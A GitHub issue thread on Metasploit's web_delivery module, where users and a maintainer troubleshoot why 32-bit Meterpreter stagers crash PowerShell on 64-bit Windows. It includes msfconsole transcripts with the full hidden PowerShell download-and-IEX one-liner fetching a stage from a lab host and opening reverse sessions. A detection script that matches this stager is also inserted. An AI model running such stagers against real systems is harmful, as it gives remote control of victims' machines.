
PowerShell web_delivery crashing targets' powershell.exe #10502

Open
Clickbaitcake opened this issue Aug 21, 2018 · 9 comments

@Clickbaitcake

commented Aug 21, 2018

Steps to reproduce

How'd you do it?

Exploit: multi/script/web_delivery
Payload: windows/meterpreter/reverse_https

Module options (exploit/multi/script/web_delivery):

| Name | Current Setting | Required | Description |
| --- | --- | --- | --- |
| SRVHOST | 0.0.0.0 | yes | The local host to listen on. This must be an address on the local machine or 0.0.0.0 |
| SRVPORT | 443 | yes | The local port to listen on. |
| SSL | true | no | Negotiate SSL for incoming connections |
| SSLCert | /root/unified.pem | no | Path to a custom SSL certificate (default is randomly generated) |
| URIPATH | / | no | The URI to use for this exploit (default is random) |

Payload options (windows/meterpreter/reverse_https):

| Name | Current Setting | Required | Description |
| --- | --- | --- | --- |
| EXITFUNC | process | yes | Exit technique (Accepted: '', seh, thread, process, none) |
| LHOST | ads.symxxx.xxx | yes | The local listener hostname |
| LPORT | 8443 | yes | The local listener port |
| LURI | | no | The HTTP Path |

Exploit target:

| Id | Name |
| --- | --- |
| 3 | Regsvr32 |

This exploit was working absolutely fine yesterday.

Expected behavior

A sessions should start.

Current behavior

Powershell.exe crashes when running the supplied command.


System stuff

Ubuntu 18 x64
Attacking Windows 10 ent 1709 x64

Metasploit version

Framework: 4.17.5-dev
Console : 4.17.5-dev


I installed Metasploit with:

- [ ] Kali package via apt
- [x] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from versi)
- [ ] Source install (please specify ruby version)

OS

Ubuntu 18.0

Is this issue related to the version that I have pulled? -dev?

@Kali-Viking


commented Sep 4, 2018

Framework v4.17.9-dev, in the same module, the "windows/meterpreter/reverse_tcp" payload also causes the same issue. The exploit runs fine, but as soon as you copy and paste the (Target 2 - PSH) Powershell code into the target and run it, either it will not execute or Powershell errors out. Happens on both 32 & 64 bit systems running Win7 or Win10.

The exploit works as expected in Framework v4.17.3-dev.

@Clickbaitcake

Author

commented Sep 4, 2018

@viris


commented Sep 6, 2018

Try with this payload:

```
set payload windows/x64/meterpreter/reverse_https
```

It looks like there is 32 or x64 issue ;)

@jmartin-r7

Contributor

commented Sep 25, 2018

Sorry for the delayed response here.

Omnibus nightly installers are all marked as -dev as they are constantly updated. Currently builds are from the 4.x branch.

Can you add more detail? I don't show anything I would suspect to impact powershell has landed since Jun 25th. Can you offer details as to how you are launching?

The payloads you are referring to would not be compatible with the web_delivery module. Also, the default target type for web_delivery is python; using `set target 2` would actually be required for a powershell compatible transfer to generate.

```
$ ./msfconsole -qx "use exploit/multi/script/web_delivery; set payload windows/meterpreter/reverse_tcp; set LHOST en0; exploit"
payload => windows/meterpreter/reverse_tcp
LHOST => en0
[-] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/script/web_delivery) > exit
$ ./msfconsole -qx "use exploit/multi/script/web_delivery; set payload windows/x64/meterpreter/reverse_https; set LHOST en0; exploit"
payload => windows/x64/meterpreter/reverse_https
LHOST => en0
[-] Exploit failed: windows/x64/meterpreter/reverse_https is not a compatible payload.
[*] Exploit completed, but no session was created.
```

Your report also refers to payload options being set. This should help with ensuring targeting on what is delivered to reach your handler, but again, the payloads you refer to are not compatible with web_delivery.

@Kali-Viking


commented Oct 3, 2018

@jmartin-r7 - not sure if you saw my comments:

Framework v4.17.9-dev, in the same module, the "windows/meterpreter/reverse_tcp" payload also causes the same issue. The exploit runs fine, but as soon as you copy and paste the (Target 2 - PSH) Powershell code into the target and run it, either it will not execute or Powershell errors out. Happens on both 32 & 64 bit targets running Win7 or Win10.

The exploit works as expected in Framework v4.17.3-dev.

@jmartin-r7

Contributor

commented Oct 4, 2018

@Kali-Viking thanks for the clarification, I think I have been able to reproduce the original issue here.

This impacts 32-bit meterpreter on 64-bit systems; tests show windows/meterpreter/reverse_tcp fails, however windows/x64/meterpreter/reverse_tcp succeeds on clean systems.

4.17.3 with 32-bit

```
$ ./msfconsole -qx "use exploit/multi/script/web_delivery; set TARGET 2; set payload windows/meterpreter/reverse_tcp; set LHOST 172.16.69.1; set LPORT 4445; exploit"
TARGET => 2
payload => windows/meterpreter/reverse_tcp
LHOST => 172.16.69.1
LPORT => 4445
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.69.1:4445
msf exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/qG15Oz
[*] Local IP: http://192.168.25.109:8080/qG15Oz
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $Q=new-object net.webclient;$Q.proxy=[Net.WebRequest]::GetSystemWebProxy();$Q.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $Q.downloadstring('http://172.16.69.1:8080/qG15Oz');

msf exploit(multi/script/web_delivery) >
[*] 172.16.69.227    web_delivery - Delivering Payload
[*] Sending stage (179779 bytes) to 172.16.69.227
[*] Meterpreter session 1 opened (172.16.69.1:4445 -> 172.16.69.227:49671) at 2018-10-03 20:35:00 -0500
```

4.x master with 64-bit

```
$ ./msfconsole -qx "use exploit/multi/script/web_delivery; set TARGET 2; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 172.16.69.1; set LPORT 4445; exploit"
TARGET => 2
payload => windows/x64/meterpreter/reverse_tcp
LHOST => 172.16.69.1
LPORT => 4445
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.69.1:4445
msf exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/jZ5gy5P
[*] Local IP: http://192.168.25.109:8080/jZ5gy5P
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://172.16.69.1:8080/jZ5gy5P');

msf exploit(multi/script/web_delivery) >
[*] 172.16.69.227    web_delivery - Delivering Payload
[*] Sending stage (206403 bytes) to 172.16.69.227
[*] Meterpreter session 1 opened (172.16.69.1:4445 -> 172.16.69.227:49673) at 2018-10-03 20:30:06 -0500
```

4.x master with 32-bit

```
$ ./msfconsole -qx "use exploit/multi/script/web_delivery; set TARGET 2; set payload windows/meterpreter/reverse_tcp; set LHOST 172.16.69.1; set LPORT 4445; exploit"
TARGET => 2
payload => windows/meterpreter/reverse_tcp
LHOST => 172.16.69.1
LPORT => 4445
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.69.1:4445
msf exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/p3DGocvT7kzJpj
[*] Local IP: http://192.168.25.109:8080/p3DGocvT7kzJpj
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $U=new-object net.webclient;$U.proxy=[Net.WebRequest]::GetSystemWebProxy();$U.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $U.downloadstring('http://172.16.69.1:8080/p3DGocvT7kzJpj');

msf exploit(multi/script/web_delivery) >
[*] 172.16.69.227    web_delivery - Delivering Payload

msf exploit(multi/script/web_delivery) > exit

[*] Server stopped.
```

Further investigation is in progress; I have determined that reverting the metasploit-payloads gem still results in failure with 32-bit payloads.

```
Using metasploit-payloads 1.3.40 (was 1.3.52)
...
$ ./msfconsole -qx "use exploit/multi/script/web_delivery; set TARGET 2; set payload windows/meterpreter/reverse_tcp; set LHOST 172.16.69.1; set LPORT 4445; exploit"
TARGET => 2
payload => windows/meterpreter/reverse_tcp
LHOST => 172.16.69.1
LPORT => 4445
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.69.1:4445
msf exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/p7Pjm9TJ
[*] Local IP: http://192.168.25.109:8080/p7Pjm9TJ
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('http://172.16.69.1:8080/p7Pjm9TJ');

msf exploit(multi/script/web_delivery) >
[*] 172.16.69.227    web_delivery - Delivering Payload

msf exploit(multi/script/web_delivery) >
```
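Detection-side illustration of the stager format quoted in the transcripts above (an added example, not code from this issue or from Metasploit): it inspects process-creation command lines, such as the CommandLine field of Sysmon Event ID 1 or Windows Event 4688, for the traits of the web_delivery PSH one-liner (no-profile, hidden window, Net.WebClient, DownloadString fed into IEX) and extracts the staging URL so it can be blocked or hunted. The sample command lines are constructed; the first copies the one-liner shown in the transcript.

```python
import re

# Constructed sample CommandLine values (not real telemetry). The first one
# reproduces the web_delivery PSH stager quoted in this issue; the second is
# an ordinary scheduled-script invocation used as a benign control.
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -c $Q=new-object net.webclient;"
    "$Q.proxy=[Net.WebRequest]::GetSystemWebProxy();"
    "$Q.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
    "IEX $Q.downloadstring('http://172.16.69.1:8080/qG15Oz');",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

# Each regex captures one trait of the stager; all are case-insensitive because
# PowerShell tokens are, and the generator varies variable names per run.
_POWERSHELL = re.compile(r"(?i)\bpowershell(?:\.exe)?\b")
_NOPROFILE = re.compile(r"(?i)(?<![\w-])-nop(?:rofile)?\b")
_HIDDEN = re.compile(r"(?i)(?<![\w-])-w(?:indowstyle)?\s+hidden\b")
_WEBCLIENT = re.compile(r"(?i)new-object\s+(?:system\.)?net\.webclient")
_DOWNLOAD = re.compile(r"(?i)\.downloadstring\(\s*['\"]([^'\"]+)['\"]\s*\)")
_IEX = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")


def analyse_cmdline(cmdline: str) -> dict:
    """Return the stager traits found in one command line plus the staging URL.

    'suspicious' is set when a PowerShell launch downloads a string over
    HTTP and evaluates it; -nop / -w hidden are recorded as extra context
    because they are optional and trivial for an operator to drop.
    """
    traits = []
    if _POWERSHELL.search(cmdline):
        traits.append("powershell")
    if _NOPROFILE.search(cmdline):
        traits.append("noprofile")
    if _HIDDEN.search(cmdline):
        traits.append("hidden_window")
    if _WEBCLIENT.search(cmdline):
        traits.append("webclient")
    match = _DOWNLOAD.search(cmdline)
    if match:
        traits.append("downloadstring")
    if _IEX.search(cmdline):
        traits.append("iex")
    suspicious = {"powershell", "downloadstring", "iex"} <= set(traits)
    return {
        "traits": traits,
        "staging_url": match.group(1) if match else None,
        "suspicious": suspicious,
    }


def scan(cmdlines):
    """Return the analysis of every command line judged suspicious."""
    return [r for r in map(analyse_cmdline, cmdlines) if r["suspicious"]]
```

The extracted staging URL is what a responder would feed to proxy logs to find other hosts that fetched the same stage.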
@rrsit


commented Oct 22, 2018

Same problem here.

Version Framework: 4.17.18-dev
Tested on Windows 10 and Windows 7.
Tried viris' suggestion (`set payload windows/x64/meterpreter/reverse_https`); then the session opens, but cannot execute any commands.

```
msf exploit(multi/script/web_delivery) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > ls
[-] Unknown command: ls.
```

@jmartin-r7

Contributor

commented Nov 20, 2018

#10931 may be related to this.

@KevinBollengier


commented Nov 30, 2018

Using this exploit module I'm not able to execute the payload windows/x64/meterpreter/reverse_tcp with target 2 PSH on Windows 10 devices. I am able to retrieve a meterpreter shell on Windows 7 service pack 1.0.

Does anyone know why the generated powershell payload doesn't work on Windows 10 systems (on which I have remote system level privileges)?

@Green-m Green-m added the bug label Dec 26, 2018
